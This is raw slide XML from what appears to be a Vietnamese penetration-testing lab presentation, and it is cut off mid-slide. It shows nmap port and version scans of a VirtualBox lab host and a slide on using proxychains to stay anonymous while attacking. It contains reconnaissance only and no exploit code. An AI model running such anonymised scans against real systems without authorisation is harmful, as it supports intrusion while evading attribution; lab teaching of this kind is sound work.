              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-ds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>512/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>513/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  login                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>514/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  shell                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>1099/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>rmiregistry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>1524/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ingreslock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2593814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054224-4B9A-4D4E-A104-648DEB8130B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="148855"/>
            <a:ext cx="10515600" cy="6259033"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>2049/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>2121/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ccproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-ftp                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>3306/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>3632/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>distccd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>5432/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>5900/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>6000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  X11                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>6667/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>6697/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ircs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>8009/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  ajp13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>8180/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>8787/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>msgsrvr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>40758/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> open  unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>47044/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> open  unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>47455/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> open  unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>49444/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> open  unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>MAC Address: 08:00:27:EF:60:ED (Oracle VirtualBox virtual NIC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 78.99 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699735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5471AE-6E93-45E5-BD9B-DECBE37AFA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="333152"/>
            <a:ext cx="10515600" cy="6301563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chúng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.56.102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] config file found: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] preloading /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/lib/x86_64-linux-gnu/libproxychains.so.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng 4.17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 07:02 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] Strict chain  ...  127.0.0.1:9050  ...  Timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap scan report for 192.168.56.102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host is up (0.00072s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not shown: 977 closed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ports (reset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3639225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B69DF7-A119-4511-BFFF-B0A61B4071E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="248093"/>
            <a:ext cx="8596668" cy="5793269"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PORT     STATE SERVICE    VERSION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>21/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>23/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   	open  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
